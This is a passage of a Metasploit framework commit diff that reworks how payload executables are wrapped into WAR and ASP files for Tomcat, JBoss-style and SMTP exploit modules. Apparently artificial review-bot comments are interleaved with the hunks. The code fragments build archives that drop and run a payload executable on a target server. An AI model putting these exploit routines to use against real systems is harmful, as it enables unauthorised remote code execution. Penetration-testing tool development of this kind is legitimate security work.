
rework to_jsp_war a bit, fix uses, default msfencode -t war to x86/win32

git-svn-id: file:///home/svn/framework3/trunk@10397 4d416f70-5f16-0410-b530-b9f4589650da
1 parent 2cd8b7d commit bd1eeb372224323c55be4f45933683a0f6d75b1c @jduck jduck committed Sep 20, 2010
@@ -97,7 +97,8 @@ def self.generate_simple(payload, opts)
plat = Msf::Module::PlatformList.transform(opts['Platform'])
tmp_plat = plat.platforms
- buf = Msf::Util::EXE.to_jsp_war(framework, arch, tmp_plat, e.encoded, {:persist => false, :template => altexe})
+ exe = Msf::Util::EXE.to_executable(framework, arch, tmp_plat, e.encoded, { :template => altexe})
+ buf = Msf::Util::EXE.to_jsp_war(exe, {:persist => false })
else
# Serialize the generated payload to some sort of format
buf = Buffer.transform(e.encoded, fmt)
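Review bot: The value returned by `to_executable` on the added line is passed straight to `to_jsp_war` with no nil check, so an arch/platform pair that produces no executable would fail inside the WAR builder instead of at the call site. The `if(exe)` test kept in the last hunk of this commit suggests a nil result is possible, although `to_executable` itself is not shown. A guard such as `raise ArgumentError, 'no executable for this arch/platform' unless exe` before the `to_jsp_war` call would make the failure explicit; the `when 'war'` branches in the `encode` hunk and the `case cmd` hunk have the same gap. In the last hunk `exe` is reused for the WAR bytes, so its `if(exe)` only runs after `to_jsp_war` has already received the value, and a separate name for the WAR would be clearer. `generate_simple` starts and ends outside this hunk.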
@@ -216,7 +216,8 @@ def encode(token, data, encoder, options)
output = Msf::Util::EXE.to_win32pe_asp($framework, raw, {:insert => inject, :persist => false, :template => altexe})
when 'war'
tmp_plat = plat.platforms
- output = Msf::Util::EXE.to_jsp_war($framework, arch, tmp_plat, raw, {:persist => false, :template => altexe})
+ exe = Msf::Util::EXE.to_executable($framework, arch, tmp_plat, raw, { :template => altexe})
+ output = Msf::Util::EXE.to_jsp_war(exe, { :persist => false })
else
fmt ||= "ruby"
output = Msf::Simple::Buffer.transform(raw, fmt)
@@ -813,9 +813,7 @@ def self.to_war(jsp_raw, opts={})
# Creates a Web Archive (WAR) file containing a jsp page and hexdump of a payload.
# The jsp page converts the hexdump back to a normal .exe file and places it in
# the temp directory. The payload .exe file is then executed.
- def self.to_jsp_war(framework, arch, plat, code='', opts={})
-
- exe = to_executable(framework, arch, plat, code, opts)
+ def self.to_jsp_war(exe, opts={})
# begin <payload>.jsp
var_hexpath = Rex::Text.rand_text_alpha(rand(8)+8)
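Review bot: The comment block above `to_jsp_war` does not describe the new `exe` argument, and after this change the method no longer builds the executable itself. I would add `# exe  - raw bytes of an already generated executable (see to_executable)` and `# opts - WAR options such as :jsp_name, :app_name and :persist; :template is no longer read here`. That `:template` was consumed only by the removed `to_executable` call is inferred from the callers in this commit moving it there, so confirm against the rest of the method, which continues outside the hunk.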
@@ -172,9 +172,8 @@ def exploit
:jsp_name => jsp_name
})
else
- @war_data = Msf::Util::EXE.to_jsp_war(framework,
- arch, plat,
- p.encoded,
+ exe = generate_payload_exe({ :code => p.encoded })
+ @war_data = Msf::Util::EXE.to_jsp_war(exe,
{
:app_name => app_base,
:jsp_name => jsp_name
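Review bot: `generate_payload_exe` is called on the added line, but no hunk for this file adds `include Msf::Exploit::EXE`, which the other modules in this commit gain together with the same call. If the class does not already mix that module in, the call raises NoMethodError at run time; confirm the include is present or add `include Msf::Exploit::EXE` next to the existing includes. The later hunk that switches to `to_exe_asp(exe)` shows the same gap. Both `exploit` and the `to_jsp_war` call continue outside this hunk.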
@@ -17,6 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] }
include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
@@ -182,16 +183,10 @@ def exploit
print_status("Using manually select target \"#{mytarget.name}\"")
end
- # set arch/platform from the target
- arch = mytarget['Arch']
- plat = [Msf::Module::PlatformList.new(mytarget['Platform']).platforms[0]]
-
# Generate the WAR containing the EXE containing the payload
jsp_name = rand_text_alphanumeric(4+rand(32-4))
- war = Msf::Util::EXE.to_jsp_war(framework,
- arch, plat,
- payload.encoded,
- :jsp_name => jsp_name)
+ exe = generate_payload_exe
+ war = Msf::Util::EXE.to_jsp_war(exe, :jsp_name => jsp_name)
app_base = rand_text_alphanumeric(4+rand(32-4))
query_str = "?path=/" + app_base
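Review bot: The removed lines took architecture and platform from `mytarget`, while the new `generate_payload_exe` call takes no arguments, so this hunk does not show whether the executable is still built for the target held in `mytarget`. The context line printing `mytarget.name` implies that `mytarget` is resolved separately from the module's configured target. Until that is confirmed I would leave a marker above the call, `# NOTE: arch/platform now come from generate_payload_exe, not mytarget - confirm they agree`. `exploit` starts and ends outside the hunk.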
@@ -18,6 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote
# This module sends email messages via smtp
#
include Msf::Exploit::Remote::SMTPDeliver
+ include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
@@ -142,16 +143,7 @@ def exploit
if (target.arch.include?(ARCH_CMD))
cmd = Rex::Text.encode_base64(payload.encoded, "\r\n")
else
- bin = ''
-
- if(target.arch.index(ARCH_PPC))
- bin = Msf::Util::EXE.to_osx_ppc_macho(framework, payload.encoded)
- end
-
- if(target.arch.index(ARCH_X86))
- bin = Msf::Util::EXE.to_osx_x86_macho(framework, payload.encoded)
- end
-
+ bin = generate_payload_exe
cmd = Rex::Text.encode_base64(bin, "\r\n")
end
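Review bot: The removed branch initialised `bin = ''`, so `Rex::Text.encode_base64` always received a string; with `bin = generate_payload_exe` that is no longer guaranteed if the helper can return nil for an unsupported target, which is not visible here. A check such as `raise RuntimeError, 'Unable to generate payload executable' unless bin` directly after the assignment would surface the problem there rather than as an error inside the encoder. `exploit` starts and ends outside the hunk.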
@@ -17,6 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }
include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
@@ -55,13 +56,12 @@ def initialize(info = {})
def exploit
- arch = target['Arch']
- plat = [Msf::Module::PlatformList.new(target['Platform']).platforms[0]]
-
# Generate the WAR containing the EXE containing the payload
app_base = rand_text_alphanumeric(4+rand(32-4))
jsp_name = rand_text_alphanumeric(8+rand(8))
- war_data = Msf::Util::EXE.to_jsp_war(framework, arch, plat, payload.encoded, :jsp_name => jsp_name)
+
+ exe = generate_payload_exe
+ war_data = Msf::Util::EXE.to_jsp_war(exe, :jsp_name => jsp_name)
res = send_request_cgi(
{
@@ -50,7 +50,8 @@ def initialize
def exploit
# Generate the ASP containing the EXE containing the payload
- asp = Msf::Util::EXE.to_win32pe_asp(framework,payload.encoded)
+ exe = generate_payload_exe
+ asp = Msf::Util::EXE.to_exe_asp(exe)
path = datastore['PATH'].gsub('%RAND%', rand(0x10000000).to_s)
path_tmp = path.gsub(/\....$/, ".txt")
@@ -273,8 +273,11 @@ case cmd
asp = Msf::Util::EXE.to_win32pe_asp($framework, raw, {:insert => inject, :persist => false, :template => altexe})
write_encoded(asp)
when 'war'
- tmp_plat = plat.platforms
- war = Msf::Util::EXE.to_jsp_war($framework, arch, tmp_plat, raw, {:persist => false, :template => altexe})
+ arch ||= [ ARCH_X86 ]
+ tmp_plat = plat.platforms if plat
+ tmp_plat ||= Msf::Module::PlatformList.transform('win')
+ exe = Msf::Util::EXE.to_executable($framework, arch, tmp_plat, raw, { :insert => inject, :template => altexe })
+ war = Msf::Util::EXE.to_jsp_war(exe, { :persist => false })
write_encoded(war)
else
fmt ||= "ruby"
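Review bot: The fallback `tmp_plat ||= Msf::Module::PlatformList.transform('win')` assigns the PlatformList object itself, whereas the line above assigns `plat.platforms`, so `to_executable` receives two different types depending on whether a platform was supplied. The `generate_simple` hunk in this commit calls `.platforms` on the result of `transform`, which suggests the fallback should read `tmp_plat ||= Msf::Module::PlatformList.transform('win').platforms`. This branch also passes `:insert => inject` to `to_executable`, which the other two WAR callers do not; a short comment on why would help. The `case cmd` statement continues outside the hunk.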
@@ -156,7 +156,8 @@ if (cmd =~ /^(p|y|r|d|c|j|x|b|v|w)/)
arch = payload.arch
plat = payload.platform.platforms
- exe = Msf::Util::EXE.to_jsp_war($framework, arch, plat, buf)
+ exe = Msf::Util::EXE.to_executable($framework, arch, plat, buf)
+ exe = Msf::Util::EXE.to_jsp_war(exe)
if(exe)
